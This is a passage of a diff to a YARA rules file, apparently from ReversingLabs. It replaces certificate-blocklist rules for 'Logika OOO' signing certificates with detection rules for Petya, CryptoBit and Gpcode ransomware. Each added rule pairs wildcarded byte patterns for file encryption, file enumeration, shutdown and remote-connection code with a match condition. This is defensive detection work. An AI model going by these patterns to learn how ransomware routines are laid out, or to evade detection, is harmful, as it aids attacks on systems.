+            E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83
+        }
+		$find_files_2_p2 = {
+            F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF
+            15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B F0 80
+            BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 00
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B D0
+            8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? F6
+            85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E9
+        }
+		$encrypt_files_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 89 9D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 6A ?? FF B5
+            ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF D6 8B D8
+            83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 57
+            FF D6 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
+            A5 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ??
+            ?? ?? ?? 85 F6 0F 95 C3 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 89 B5 ?? ?? ?? ?? 56 53 FF
+        }
+		$encrypt_files_p2 = {
+            15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 56 ?? 8B 85 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 C8 8D 85 ?? ?? ?? ??
+            3B 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 6A ?? 0F 44 F2 56 6A ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 BA ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 FF B5
+            ?? ?? ?? ?? FF D6 B3 ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ??
+            ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77
+            ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOGIKA, OOO" and pe.signatures [ i ] . serial == "1d:3f:39:f4:81:fe:06:7f:8a:92:89:bb:49:e0:5a:04" and 1592553220 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Be35D025E65Cc7A4Ee01F72 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Petya : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Petya ransomware."
 		author = "ReversingLabs"
-		id = "533bcad1-b589-5a05-8f35-32fcb79c7f68"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "93d9fb33-88d1-50ec-bf99-1888201c0ec2"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4308-L4324"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dad7ab834a67d36c0b63e45922aea566dc0aaf922be2b74161616b3caea83fdc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Petya.yara#L3-L58"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d2adafcb21b627d614eab79e64e2b96ad09fae796d0670452a19490d8781ce99"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Petya"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$entry_point = {
+            55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ??
+            ?? ?? ?? 8B C7 5F 5E 5D C2
+        }
+		$shutdown_pattern = {
+            55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D
+            45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B
+            E5 5D C3
+        }
+		$sectionxxxx_pattern = {
+            83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0
+            74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ??
+            ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B
+            E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24
+            ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72
+            ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A
+            03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F
+            5E 5D 0F B6 C2 5B 83 C4 ?? C3
+        }
+		$crypt_gen_pattern = {
+            55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 6A ?? 58 EB ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D
+            C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "7b:e3:5d:02:5e:65:cc:7a:4e:e0:1f:72" and 1594976445 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern
 }
-
-rule REVERSINGLABS_Cert_Blocklist_351Fe2Efdc0Ac56A0C822Cf8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptobit : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoBit ransomware."
 		author = "ReversingLabs"
-		id = "ac6b7c6d-781b-5c91-80fe-b822ee00ea7f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8566e516-9884-5b20-90c4-7ed38fa96999"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4326-L4342"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "46b87c3531e01ba150f056ec3270564426363ef8c58256eeedbcab247c7625e4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.CryptoBit.yara#L1-L113"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ccc8a0f1c5e11211649992d0f2b309968c97b49f1c7359e62d622f364e117429"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoBit"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83
+            7D ?? ?? 75 ?? FF 75 ?? EB ?? 6A ?? 59 83 C9 ?? 83 F1 ?? 89 4D ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 89 45 ?? 60 BE ?? ?? ??
+            ?? 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 D2
+            8B 0D ?? ?? ?? ?? F7 F1 0B C0 74 ?? FF 35 ?? ?? ?? ?? EB ?? 52 8B 0C 24 29 4D ?? 51
+            FF 75 ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 0B C0 74 ?? 89 45 ?? 51 FF
+            75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 89 45 ?? 89 4D ?? FF 75 ??
+            E8 ?? ?? ?? ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? A1 ?? ?? ??
+            ?? 01 45 ?? EB ?? EB ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64
+            8F 05 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D
+            ?? EB ?? 8B 45 ?? C9 C2
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ??
+            0B C0 74 ?? E9 ?? ?? ?? ?? 89 45 ?? 8B 15 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 83 F8 ??
+            73 ?? E9 ?? ?? ?? ?? EB ?? 0B C9 75 ?? 3B C2 73 ?? 50 EB ?? 52 8F 45 ?? 83 7D ?? ??
+            75 ?? A1 ?? ?? ?? ?? 39 45 ?? 72 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ??
+            ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 89 45 ?? 60 BE ?? ?? ?? ??
+            56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? FF 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
+            75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 50 8B 4D ?? 8B 04 24 83 C9 ?? 83 F1 ?? 51 50 E8 ??
+            ?? ?? ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 8F 05 ?? ?? ?? ?? 83
+            C4 ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D ?? EB ?? 33 C0 33 C9 C9 C2
+        }
+		$find_files_p1 = {
+            55 8B EC 83 C4 ?? 57 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 83 7E ?? ?? 75 ?? E8 ?? ?? ?? ?? 50 8D 46 ?? 50 E8
+            ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 35 ?? ?? ?? ?? 8D 46
+            ?? 50 E8 ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F
+            84 ?? ?? ?? ?? 89 45 ?? B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F 84 ??
+            ?? ?? ?? 89 45 ?? 8B 75 ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 56 E8 ?? ?? ?? ?? 8D 57 ?? 8B
+            47 ?? D1 E0 C7 04 10 ?? ?? ?? ?? C6 44 10 ?? ?? FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 8B 75 ?? 8B 7D ?? 8B 02 25 ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? F7 02 ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D 47
+            ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 89 47 ?? F7 02 ?? ?? ?? ??
+            74 ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? FF 77 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
+            83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 48 50 FF 76 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 0B C0 75
+        }
+		$find_files_p2 = {
+            0B C9 74 ?? FF 45 ?? E9 ?? ?? ?? ?? 83 7A ?? ?? 0F 84 ?? ?? ?? ?? 81 7A ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 8B F8 FF 76 ?? 8F 47 ?? FF 76 ??
+            8F 47 ?? FF 36 8F 07 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D
+            47 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ??
+            ?? ?? ?? 89 47 ?? 83 3F ?? 75 ?? 57 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 0B C0 75
+            ?? 57 E8 ?? ?? ?? ?? EB ?? 57 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ??
+            E8 ?? ?? ?? ?? 0B C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 75 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            14 24 51 50 52 8D 46 ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 D1 E1 8B 5C 24 ?? 51 50 53 8D 46
+            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 5E 5F C9 C2
+        }
+		$remote_connection = {
+            55 8B EC 81 C4 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 6A ?? FF 75 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 89 85 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8D 5D ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 23 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 74 ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 0B C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? C9 C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" and 1594976475 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9Cfbb4C69008821Aaacecde97Ee149Ab : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gpcode : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Gpcode ransomware."
 		author = "ReversingLabs"
-		id = "a8ba633b-fbbe-51ca-9f67-fb91ce9ac2f7"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "168833dd-44ab-59e1-a610-b9219b2907ff"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4344-L4362"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d74b13eeb5d0a57c5dd3257480230c504a68a8422e77a46bb2e101abb2c7f282"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Gpcode.yara#L1-L67"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "329309873977f73a8ebe758018ebc8ba42e15c3c7cbb9a65865631d235f5bb48"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GPCode"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$drive_loop = {
+            B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80
+            C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D
+        }
+		$encrypt_routine = {
+            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10]
+            E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ??
+            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15)
+            ?? ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
+            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ??
+            75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8
+        }
+		$set_ransom_wallpaper = {
+             0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ??
+             B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F
+             59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33
+             C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+             ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+             68 ?? ?? ?? ?? (E8 | FF 15)
+        }
+		$read_config_file = {
+            55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ??
+            E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF
+            75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
